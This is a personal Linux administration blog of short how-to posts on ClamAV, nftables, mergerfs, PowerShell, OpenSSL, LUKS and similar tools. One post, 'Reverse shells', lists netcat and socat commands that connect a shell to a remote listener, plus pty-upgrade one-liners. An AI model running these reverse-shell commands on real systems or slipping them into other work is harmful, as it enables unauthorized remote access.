ClamAV
December 16, 2019 — 15:14

Author: silver  Category: linux  Comments: Off

ClamAV is a decent anti virus scanner for Linux. Unfortunately it does not run every well on low memory systems (<1GB).

Running it’s database update tool freshclam can cause OOM. You will notice this if getting daily cdiff’s keeps failing (see ‘dmesg’ and /var/log/clamdb). These are db differences only instead of full files. The problem is processing these to create whole cvd’s.

If there’s close to enough RAM you could try using cgroups (or systemd) – if thats available, or good old ulimit:

Edit /etc/cron.d/clamav-freshclam and replace whats there with:

29 */1 * * *    clamav [ -x /usr/bin/freshclam ] && { ulimit -Sm 512000; ulimit -Sv 512000; ulimit -Hm 1024000; ulimit -Hv 1024000; /usr/bin/freshclam --quiet; } > /dev/null

But what if you’re on an embedded system or small vps and there’s not even close to 1GB memory available?

Simple, just get the full cvd files instead:

29 */1 * * *     clamav { for i in bytecode.cvd daily.cvd main.cvd; do wget -N -q "http://db.local.clamav.net/$i" -O /var/lib/clamav/$i; done; }  > /dev/null

Password Managers
December 11, 2019 — 15:34

Author: silver  Category: encryption linux windows  Comments: Off

There are basically 3 different categories to choose from, depending on location of service and db: Local, "Cloud"/SaaS or selfhosted On-Premise.

For single user/home usage KeePass is fine or perhaps even the password manager included in web browsers. Using one of the SaaS options such as LastPass adds ease of access.

For company/enterprise usage sharing passwords in groups/teams should be supported and preferably an on-prem option.

nftables
December 11, 2019 — 14:32

Author: silver  Category: linux network  Comments: Off

nftables (nft) replaces iptables:

  • Debian (10 buster) links ‘iptables’ to ‘iptables-nft’ and ‘iptables-legacy’ is actually ‘iptables’
  • RH uses nft as as preferred firewall since RHEL8 and firewalld uses nft as backend

config

rules are located in:

  • Debian /etc/nftables.conf
  • RH /etc/sysconfig/nftables.conf

list

nft list ruleset

nft list chain ip filter INPUT

nft list tables nft list table ip filter

flush

nft flush ruleset

more info

mergerfs
September 6, 2019 — 18:36

Author: silver  Category: linux storage  Comments: Off

Union filesystem (FUSE) like unionfs, aufs and mhddfs. Merge multiple paths and mount them, similar to concatenating.

Get it here: https://github.com/trapexit/mergerfs or from OS package repository.

Compared to (older) alternatives mergerfs seems very stable over the past months I’ve been using it. It offers multiple options on how to spread the data over the used drives.

Optionally SnapRAID can be used to add parity disk(s) to protect against disk failures (https://www.snapraid.it).

Create/mount pool

Example using 5 devices /dev/sd[b-f]

Disks are already partitioned have a fs

for i in {b..f}; do
  mkdir /mnt/sd${i}1
  mount /dev/sd${i}1 /mnt/sd${i}1 && \
  mkdir /mnt/sd${i}1/mfs
done && \
mkdir /mnt/mergerfs && \
mergerfs -o defaults,allow_other,use_ino /mnt/sd*/mfs /mnt/mergerfs

And here’s the result from ‘df’:

/dev/mapper/sdb1             3.6T  100M  3.5T  1% /mnt/sdb1
/dev/mapper/sdc1             3.6T  100M  3.5T  1% /mnt/sdc1
/dev/mapper/sdd1             3.6T  100M  3.5T  1% /mnt/sdd1
/dev/mapper/sde1             3.6T  100M  3.5T  1% /mnt/sde1
/dev/mapper/sdf1             3.6T  100M  3.5T  1% /mnt/sdf1
mergerfs                      18T  500M  8.5T  1% /mnt/mergerfs

Changing pool

remove old drive from mergerfs pool

xattr -w user.mergerfs.srcmounts -/mnt/data1 /mnt/pool/.mergerfs

add new drive

xattr -w user.mergerfs.srcmounts +/mnt/data4 /mnt/pool/.mergerfs

some other mount options (-o)

  • use_ino make mergerfs supply inodes
  • fsname=example-name name in df
  • no_splice_write fixes page errors in syslog

https://github.com/trapexit/mergerfs#mount-options

Pool info

xattr -l /mnt/mergerfs/.mergerfs
# or:
mergerfs.ctl -m /mnt/mergerfs list values

mergerfs.ctl -m /mnt/mergerfs info

PowerShell
July 9, 2019 — 9:17

Author: silver  Category: dev linux windows  Comments: Off

I’ve been using PS for a while now and I don’t hate it anymore :) In fact I think it’s very usable for lots of tasks and automation.

Some Useful commands:

  • Get-Command *help* or Get-Command-Module PackageManagement
  • Get-Member to view properties e.g. Get-Disk | Get-Member
  • Get-Alias
  • Get-ExecutionPolicy -List
  • Set-ExecutionPolicy -ExecutionPolicy RemoteSigned
  • piping to select, sort and where
  • Invoke-WebRequest $url

CSV, XML and JSON support is included:

  • Import-CSV Export-CSV
  • ConvertTo-XML
  • ConvertFrom-Json ConverTO-Json

And stuff like:

  • Logging sessions: Start-Transcript Stop-Transcript
  • Viewing Certificates: cd Cert:\ (now you can ‘dir’ etc)
  • Run as admin: powershell.exe -Command "Start-Process cmd -Verb RunAs"
  • PS Linting: https://github.com/PowerShell/PSScriptAnalyzer

Remote usage is also possible over WinRM (or OpenSSH):

  • Enter-PSSession -ComputerName <host>

Then there’s Loops, Params, Arrays and Hash Tables e.g. foreach, Param([string]$arg), @() and @{}

More info:

Cgroups and NS
May 30, 2019 — 21:18

Author: silver  Category: linux  Comments: Off

Linux Control Groups and Namespaces

Used for limiting and isolation

Docs

Utils

  • lsns
  • nsenter
  • cgroup-tools pkg (cgget, cgset, …)

Network

  • ip netns list
  • ip netns identify <pid>
  • ip netns exec <netns> ip
  • or: ip -n|-netns

Processes

  • ps axwww -o cgroup
  • ps axwww -o cgroup,user,pid,%cpu,%mem,vsz,rss,tname,stat,start,time,comm
  • ps axwww -o ipcns,mntns,netns,pidns,userns,utsns,pid,comm

Filesystem

  • /proc/<pid>/ns
  • /sys/fs/cgroup

Systemd

Vim linting
May 30, 2019 — 20:50

Author: silver  Category: dev linux  Comments: Off

Linting is basically making sure source code is correct.

For Vim there’s ALE: Asynchronous Lint Engine. It supports multiple tools like cpplint for C/C++, ShellCheck for shell scripts, phan for PHP etc etc.

Download

Get it here: https://github.com/w0rp/ale

Commands

  • ALELint
  • ALEEnable
  • ALEDisable
  • ALENext
  • ALEPrevious

.vimrc

To use Ctrl+j and Ctrl+k to moving between errors:

nmap <silent> <C-k> <Plug>(ale_previous_wrap)
nmap <silent> <C-j> <Plug>(ale_next_wrap)
Zonemaster
December 8, 2018 — 17:52

Author: silver  Category: linux  Comments: Off

Zonemaster is an Open source DNS validation tool

Source: https://github.com/zonemaster/zonemaster
Hosted: https://www.zonemaster.net/domain_check

Install Perl modules

Dependencies:

cpanm File::ShareDir cpanm File::Slurp Hash::Merge IO::Socket::INET6 List::MoreUtils Mail::RFC822::Address Module::Find Moose Net::IP Readonly::XS Text::CSV Devel::CheckLib

Zonemaster LDNS and Engine:

cpanm Zonemaster::LDNS
cpanm Zonemaster::Engine

Test

time perl -MZonemaster::Engine -e &#039;print map {&quot;$_\n&quot;} Zonemaster::Engine-&gt;test_module(&quot;BASIC&quot;, &quot;zonemaster.net&quot;)&#039;

Install Perl modules

Dependencies:

cpanm MooseX::Getopt Text::Reflow Module::Install

Zonemaster CLI:

cpanm Zonemaster::CLI

Examples

zonemaster-cli --test basic zonemaster.net
zonemaster-cli --no-ipv6 --show_level --show_module --progress --level INFO --test Syntax example.com
GNU find
March 30, 2018 — 14:51

Author: silver  Category: linux windows  Comments: Off

Just a few useful ‘find’ examples

Exclude:

find . -path ./foo -prune -o -name bar
find /home \( -path /usr/data -prune -o -path /usr/src \) -prune -o -name foo -print
find . -name Makefile -not -path foo
find . -type d ! -regex .*\/\(foo\|bar\).* \;

Permissions:

find . -perm -775
find . -perm /u+w,g+
find . -printf "%m:%f\n"
find . -printf "%m %h/%f\n"|grep -v '^\(644\|755\)'

Print date:

find -type f -printf '%TF %.8TT %p\n'

Windows:

find.exe . -name *.exe -exec certutil -hashfile {} SHA512 ; >c:\hash.txt

Updating CPU Microcode
March 28, 2018 — 12:50

Author: silver  Category: linux windows  Comments: Off

BITS

Tool from Intel called “BIOS Implementation Test Suite” that can do several things including handling microcode:
https://biosbits.org
https://github.com/biosbits/bits
https://github.com/mkorthof/bits

Linux

  • load/update microcode using pkg:
  • load/update intel microcode manually:
    – get latest tgz from intel: see below
    – backup/copy files: /lib/firmware/intel-ucode
    – check kernel config: grep MICROCODE /boot/config-*
    – run iucode_tool:
    /usr/sbin/iucode_tool -tb -lS /lib/firmware/intel-ucode/*
    – update initramfs: update-initramfs -u -k all
  • reloading microcode:
    echo 1 > /sys/devices/system/cpu/microcode/reload
    or: rmmod cpuid; modprobe cpuid
  • show version:
    dmesg | grep microcode or: grep microcode /proc/cpuinfo
  • skip loading microde on boot:
    add to grub cmdline: dis_ucode_ldr

Windows

Microsoft includes certain microcode updates in Windows CPU’s. For example: KB4090007, KB3064209, KB2970215.

Get Microcode

Download the latest version from Intel:
https://downloadcenter.intel.com/download/27431/Linux-Processor-Microcode-Data-File?v=t.

Magic SysRq Key
November 25, 2017 — 22:19

Author: silver  Category: linux  Comments: Off

How to use SysRq (Print Screen key)

( “REISUB” )

enable:

echo 1 > proc/sys/kernel/sysrq

permanently:

/etc/sysctl.d/local.conf
kernel.sysrq=1

To BREAK: CTRL+PAUSE (Serial)

ALT+SysReq+KEY
When logged in using SSH the SysRq may be accessible by writing to /proc/sysrq-trigger
echo s > /proc/sysrq-trigger

useful options:

  • b: Immediately reboot the system, without unmounting or syncing filesystems
    echo b > proc/sysrq-trigger
  • e: Send the SIGTERM signal to all processes except init (PID 1)
  • f: Call oom_kill, which kills a process to alleviate an OOM condition:
  • s: Sync all mounted filesystems:
  • t: Output a list of current tasks and their information to the console:
  • u: Remount all mounted filesystems in read-only mode
  • w: Display list of blocked (D state) tasks
  • space: Print a summary of available magic SysRq keys

https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/plain/Documentation/admin-guide/sysrq.rst
https://en.wikipedia.org/wiki/Magic_SysRq_key

GoAccess
November 25, 2017 — 18:04

Author: silver  Category: linux web  Comments: Off

GoAccess is a “real-time web log analyzer” which can output in CLI or HTML (like webalizer, awstats and piwik etc). It works out of the box with Apache, for lighttpd you probably need to specify the log format. Examples below are for lighttpd. Run “goaccess /var/log/httpd/access.log” without any other arguments and it will ask for the log format and drop you into the Dashboard (text based gui).

CLI

no conf, just arguments:

goaccess /var/log/lighttpd/access.log \
--date-format=%d/%b/%Y \
--time-format='%T %z' \
--log-format='%h %v %e [%d:%t] "%r" %s %b "%R" "%u"'

-or-

change /etc/goaccess.conf:

date-format %d/%b/%Y:%T %z
log-format %h %v %e [%d] "%r" %s %b "%R" "%u"

HTML

Output to “static” html file.

current log:

goaccess /var/log/lighttpd/access.log \
  --date-format=%d/%b/%Y \
  --time-format='%T %z' \
  --log-format='%h %v %e [%d:%t] "%r" %s %b "%R" "%u"' \
  --output=/var/www/html/goaccess.html

use all logs:

zcat -f /var/log/lighttpd/access.log*gz | goaccess \
  --date-format=%d/%b/%Y \
  --time-format='%T %z' \
  --log-format='%h %v %e [%d:%t] "%r" %s %b "%R" "%u"' \
  --ignore-crawlers \
  --with-output-resolver \
  -e 127.0.0.1 -e ::1 -e exclude.example.com
  --output=/var/www/html/goaccess.html

Server

The last option is to run it as Server using WebSocket. This allows it to:

  • output realtime HTML: --real-time-html
  • run as daemon: --daemonize
  • use FIFO: --fifo-in= --fifo-out=
  • use HTTPS: --ssl-cert= --ssl-key= --ws-url=wss://url

live log:

goaccess /var/log/lighttpd/access.log \
 --date-format=%d/%b/%Y \
 --time-format='%T %z' \
 --log-format='%h %v %e [%d:%t] "%r" %s %b "%R" "%u"' \
 --output=/var/www/html/goaccess.html \
 --real-time-html \
 --ssl-cert=//etc/ssl/certs/cert.pem \
 --ssl-key=/etc/ssl/private/privkey.pem --ws-url=wss://example.com:7890

Now https://example.com/goaccess.html should should a live Dashboard (tcp port 7890 needs to be open for client).

perf
August 23, 2017 — 16:45

Author: silver  Category: linux  Comments: Off

perf – performance analysis tools for Linux

Start with:

perf top
perf bench all

Example:

To find out why “kworker” process (kernel per-cpu threads) has high CPU usage:

  • record 10 seconds of backtraces on all CPUs to perf.data:
    perf record -g -a sleep 10
  • analyse recording:
    perf report

More info:
https://www.brendangregg.com/perf.html
https://askubuntu.com/questions/33640/kworker-what-is-it-and-why-is-it-hogging-so-much-cpu

Debian
August 23, 2017 — 15:37

Author: silver  Category: linux  Comments: Off

Remote upgrade using aptitude:

  1. echo “defscrollback 10000” >>/root/.screenrc
  2. screen
  3. /etc/sysctl.conf:
    # on kernel panic reboot after 60s
    kernel.panic = 600
    # enable magic sysrq key
    kernel.sysrq=1</pre>
  4. In /etc/apt/sources.list: change old to new dist (or “stable” etc)
    ( if needed: apt-get install debian-archive-keyring )
  5. aptitude update
  6. aptitude safe-upgrade
    ( optionally/if needed: full-upgrade, dist-upgrade )

Change default editor:

sudo update-alternatives --config editor

Install build tools:

apt-get install build-essential

pkg install dates:

for file_list in `ls -rt /var/lib/dpkg/info/*.list`; do \
  stat_result=$(stat --format=%y "$file_list"); \
  printf "%-50s %s\n" $(basename $file_list .list) "$stat_result"; \
done

backports:

apt-get -t stretch-backports install “package”
aptitude -t stretch-backports install “package”

/etc/apt/preferences:

Package: *
Pin: release a=stable
Pin-Priority: 900

Package: *
Pin: release o=Debian
Pin-Priority: -10

“testing” packages:

install a pkg from testing:
sudo apt-get -t testing install tmux
show all testing pkgs:
aptitude search -F "%p %V %v" '?narrow(~i, ~Atesting)
( stable, unstable, oldstable, etc )

apt-get install package=version

ping
March 4, 2017 — 16:01

Author: silver  Category: linux  Comments: Off

When trying to ping as non root user you might get the following error:

ping: icmp open socket: Operation not permitted

There are several ways to fix this:

reinstall pkg (debian):

$ sudo apt-get install --reinstall iputils-ping

(sets cap)

manually set cap:

$ sudo setcap cap_net_raw+ep /bin/ping
$ sudo setcap cap_net_raw+ep /bin/ping6
$ sudo getcap /bin/ping
$ sudo getcap /bin/ping6

needs kernel config:
CONFIG_EXT4_FS_SECURITY=y


dont use SOCK_RAW:

socket(PF_INET, SOCK_DGRAM, PROT_ICMP)

$ cat /proc/sys/net/ipv4/ping_group_range
$ sysctl net.ipv4.ping_group_range
  • “1 0” default, nobody except root
  • “100 100” single group
  • “0 2147483647” everyone (max gid)
$ sysctl net.ipv4.ping_group_range = "0 2147483647"


/etc/sysctl.d/local.conf
net.ipv4.ping_group_range=0 2147483647


suid:

chmod +s /usr/ping
chmod +s /usr/ping6
Linux Audit
March 4, 2017 — 15:43

Author: silver  Category: linux  Comments: Off

First make sure “auditd” is started

add rules:

auditctl -a always,exit -S all -F path=/etc/passwd -F key=config1
auditctl -w /etc/passwd -p rwa -k config2

del rules:

auditctl -d always,exit -S all -F path=/etc/passwd -F key=config1
auditctl -W /etc/passwd -p rwa -k config2

(or restart auditd)

make permanent:

add rules to /etc/audit/rules.d/audit.rules

show results:

ausearch -ts today -k config1
aureport -k

disable audit logs:

systemctl mask systemd-journald-audit.socket
HP ProLiant
December 9, 2016 — 21:54

Author: silver  Category: linux other  Comments: Off

Boot:

  • BIOS: F10
  • HP SSA Smart Storage Administrator / ACU Array Configuration Utility: F5
  • ORCA / Options ROM for Configuring Arrays: Press any key…, F8
  • HP IP: F10
  • Boot Menu: F11

Install HP software:

Repository:

wget http://downloads.linux.hp.com/add_repo.sh
sh add_repo.sh spp -d redhat -r 6.7 -n
sh add_repo.sh spp -d redhat -r 6.7
sh add_repo.sh spp -d redhat -r 5.10 -n
sh add_repo.sh spp -d redhat -r 5.10
sed -i 's/gpgcheck=0/gpgcheck=1/' /etc/yum.repos.d/HP-spp.repo
rpm --import http://downloads.linux.hp.com/SDR/hpPublicKey1024.pub
rpm --import http://downloads.linux.hp.com/SDR/hpPublicKey2048.pub
rpm --import http://downloads.linux.hp.com/SDR/hpPublicKey2048_key1.pub
for i in $( rpm -qa gpg-pubkey* ); do rpm -qi $i |grep -B 8 Hewlett; done
yum install hpacucli
yum install hponcfg

HP Server Management Application and Agents Command Line Interface

# hpasmcli -s "clear iml"

HP Lights-Out Online Configuration Utility for Linux

hponcfg -f Clear_EventLog.xml -i

Clear_EventLog.xml:

<RIBCL VERSION="2.0">
 <LOGIN USER_LOGIN="Administrator" PASSWORD="xxx">
 <RIB_INFO MODE="write">
 <CLEAR_EVENTLOG/>
 </RIB_INFO>
 </LOGIN>
</RIBCL>

Clear_IML.xml:

<RIBCL VERSION="2.0">
  <LOGIN USER_LOGIN="Administrator" PASSWORD="xxx">
  <SERVER_INFO MODE="write">
    <CLEAR_IML/>
  </SERVER_INFO>
  </LOGIN>
</RIBCL>

Administrator_reset_pw.xml:

<ribcl VERSION="2.0">
 <login USER_LOGIN="Administrator" PASSWORD="boguspassword">
  <user_INFO MODE="write">
   <mod_USER USER_LOGIN="Administrator">
    <password value="NewPass123"/>
   </mod_USER>
  </user_INFO>
 </login>
</ribcl>
gnome-keyring
November 26, 2016 — 17:52

Author: silver  Category: linux  Comments: Off

Restart:

gnome-keyring-daemon -r -d

If doesn’t suffice this extra steps might help:

pgrep -f gnome-keyring-daemon
rm -rf ~/.cache/keyring-*
setsid /usr/bin/gnome-keyring-daemon /dev/null 2>&1
ln -s ~/.cache/keyring-* $GNOME_KEYRING_CONTROLA
/usr/bin/gnome-keyring-daemon --start --components=pkcs11
/usr/bin/gnome-keyring-daemon --start --components=gpg
/usr/bin/gnome-keyring-daemon --start --components=ssh
find ~/.cache/ -maxdepth 1 -type l -name 'keyring-*' -delete
sendmail with attachment
November 26, 2016 — 17:48

Author: silver  Category: linux  Comments: Off

Oneliner to send email with attachment using sendmail:

$S Subject
$B Body
$A Attachment


Display man pages as text
November 26, 2016 — 15:51

Author: silver  Category: linux  Comments: Off
man openssl | cat
man -P cat openssl
groff -t -e -mandoc -Tascii manpage.1 | col -bx > manpage.txt
Linux Disk Encryption
November 26, 2016 — 13:04

Author: silver  Category: encryption linux  Comments: Off

Linux Disk Encrption using Device Mapper, cryptsetup frontend and Linux Unified Key Setup LUKS (on disk format).

Setup:

cryptsetup -y -v luksFormat /dev/sdb1
cryptsetup luksOpen /dev/sdb1 foo
cryptsetup status foo -v

Test:

cryptsetup --test-passphrase open /dev/sdb1 # (non-LUKS)
cryptsetup luksOpen --test-passphrase /dev/sdb1
cryptsetup isLuks /dev/sdb1 && echo IMaLUKS
cryptsetup luksDump /dev/sdb1

Change:

(asks current passphase first)

cryptsetup -y luksChangeKey <target device> -S <target key slot number>
cryptsetup -y luksChangeKey /dev/sdb1 -S 1

Or use gui gnome-disks:

  • Disks (gnome-disks)
  • 1.0TB Hard Disk
  • Volumes: “Partition 1 1.0 TB LUKS”
  • Cogs/wheels

Add/remove key:

sudo cryptsetup -y luksAddKey ENCRYPTED_PARTITION
sudo cryptsetup luksRemoveKey ENCRYPTED_PARTITION

Various:

dmsetup ls --tree
lsblk
lsblk --fs
Reverse shells
November 26, 2016 — 12:45

Author: silver  Category: linux  Comments: Off

USING NETCAT:

SERVER/LISTEN:

netcat -lvp 9999

CLIENT:

netcat -e /bin/sh host.name 9999


NICER SHELL:

python -c 'import pty; pty.spawn("/bin/bash")'
( sleep 1; echo 'bla' ) | python -c "import pty; pty.spawn(['/usr/bin/sudo','-S','whoami']);"

 


 

USING SOCAT:

SERVER/LISTEN:

socat file:`tty`,raw,echo=0 tcp-listen:8888

CLIENT:

socat tcp-connect:host.name:8888 exec:'bash -li',pty,stderr,setsid,sigint,sane

CLIENT:

socat tcp:host.name:8888 exec:"bash -li",pty,stderr,setsid,sigint,sane
socat TCP-LISTEN:8888,reuseaddr,fork EXEC:bash,pty,stderr,setsid,sigint,sane
socat FILE:`tty`,raw,echo=0 TCP:1.2.3.4:8888
export STY=
stty rows 40 cols 130
stty rows 40 cols 230
EncFS
November 25, 2016 — 22:02

Author: silver  Category: encryption linux  Comments: Off

Install on CentOS6:

Required packages:

yum install -y fuse-2.8.3-5.el6.x86_64 
yum install -y fuse-libs.x86_64
yum install -y fuse-devel.x86_64
usermod -a -G fuse <your_user>
yum install -y git
yum install -y cmake
yum install -y boost-serialization.x86_64
yum install -y openssl-devel.x86_64
yum install -y rlog-devel.x86_64
yum install -y tinyxml2-devel.x86_64 
yum install -y gettext-devel.x86_64
yum install -y centos-release-scl
yum install -y devtoolset-3-gcc-c++ -y

Compile:

scl enable devtoolset-3 bash
git clone https://github.com/vgough/encfs
cd encfs
mkdir build
cd build
cmake ..
make
make test
make install
make package
mkdir ~/test
mkdir ~/Private

Test:

encfs ~/Private ~/test
echo testing > ~/test/testfile
fusermount -u ~/test
OpenVPN AS
November 25, 2016 — 21:31

Author: silver  Category: encryption linux  Comments: Off

OpenVPN Access Server is quite easy and fast to setup and includes a web gui.

Download:

Configuration:

Clickety click in the gui, plus some hardening:

Server:

Client:

auth SHA512
cipher AES-256-CBC

Connect with SSH + SOCKS Proxy + OTP:

$ ssh -D 1 to remote host

Ban user:

Ban a user from logging into the VPN or Web server
(doesn’t affect a user who is already logged in — for this, use DisconnectUser below):

/usr/local/openvpn_as/scripts/sacli --user <USER> --key prop_deny --value true UserPropPut

Re-admit a user who was previously banned:

/usr/local/openvpn_as/scripts/sacli --user <USER> --key prop_deny --value false UserPropPut

Disconnect a user:

/usr/local/openvpn_as/scripts//sacli --user <USER> --key prop_deny --value true UserPropPut

Set client cert keysize:

/usr/local/openvpn_as/scripts/sa --keysize=4096 Init

Generating init scripts:

/usr/local/openvpn_as/scripts/openvpnas_gen_init [--auto]

Google Authenticator:

Unlock a secret:

./sacli -u <USER> --lock 0 GoogleAuthLock

Lock a secret:

./sacli -u <USER> --lock 1 GoogleAuthLock

Generate a new, unlocked secret:

./sacli -u <USER> --lock 0 GoogleAuthRegen

Generate a new, locked secret:

./sacli -u <USER> --lock 1 GoogleAuthRegen

Enable Google Authenticator for all accounts:

./sacli --key vpn.server.google_auth.enable --value true ConfigPut

Enable for 1 user:

./sacli --user <USER_OR_GROUP> --key prop_google_auth --value true UserPropPut

Disable:

./sacli --key vpn.server.google_auth.enable --value false ConfigPut

Disable for 1 user:

./sacli --user <USER_OR_GROUP> --key prop_google_auth --value false UserPropPut

Revoke and reissue secret:

./sacli -u <USER> GoogleAuthRegen

Retrieve current user properties:

./confdba -us -p

Port sharing:

Advanced VPN Settings: port-share 127.0.0.1 10443
(tcp mode only)

OpenSSL
November 25, 2016 — 21:26

Author: silver  Category: encryption linux  Comments: Off

List deleted open files (after update):

lsof | grep -i libssl | grep DEL | awk '{print $1}' | sort | uniq

Generate CSR, self signed cert:

openssl genrsa -out rootCA.key 2048
openssl genrsa -des3 -out rootCA.key 2048
openssl req -x509 -new -nodes -key rootCA.key -sha256 -days 3650 -out rootCA.pem
openssl x509 -req -in server.csr -CA rootCA.pem -CAkey rootCA.key -CAcreateserial -out server.crt -days 3650 -sha256

View CSR

openssl req -in file.csr -noout -text

View cert fingerprint

openssl x509 -fingerprint -noout -in file.crt -sha256
openssl x509 -fingerprint -noout -in file.crt -sha1
openssl x509 -fingerprint -noout -in file.crt -md5

View ciphers:

openssl ciphers -v 'TLSv1' | sort

Test ciphers:

openssl s_client -connect google.com:443 -cipher "EDH"
openssl s_client -connect google.com:443 -cipher "RC4"
openssl s_client -connect google.com:443 -tls1
openssl s_client -connect google.com:443 -tls1_1
openssl s_client -connect google.com:443 -tls1_2
echo -n | openssl s_client -connect google.com:443
nmap --script ssl-enum-ciphers -p 443

Get fingerprint from live SSL cert (IRC):

echo | openssl s_client -connect efnet.port80.se:6697 |& openssl x509 -fingerprint -noout -sha256
echo | gnutls-cli -p 6697 irc.underworld.no --print-cert | sed -n '/-----BEGIN CERT/,/-----END CERT/p' |& openssl x509 -fingerprint -noout -sha256

Show fingerprint:

openssl x509 -in cert.pem -fingerprint -noout

To change the password of your private key:

openssl rsa -des3 -in ca.key -out ca_new.key
mv ca_new.key ca.key

Verifying that a Private Key Matches a Certificate

$ openssl x509 -noout -modulus -in server.pem | openssl md5 ;\
openssl rsa -noout -modulus -in server.key | openssl md5

Get the MD5 fingerprint of a certificate using OpenSSL

openssl dgst -md5 certificate.der

Get the MD5 fingerprint of a CSR using OpenSSL

openssl dgst -md5 csr.der

Debug SMTP/STARTTLS:

openssl s_client -debug -starttls smtp -crlf -connect localhost:25







We use Matomo free and open source web analytics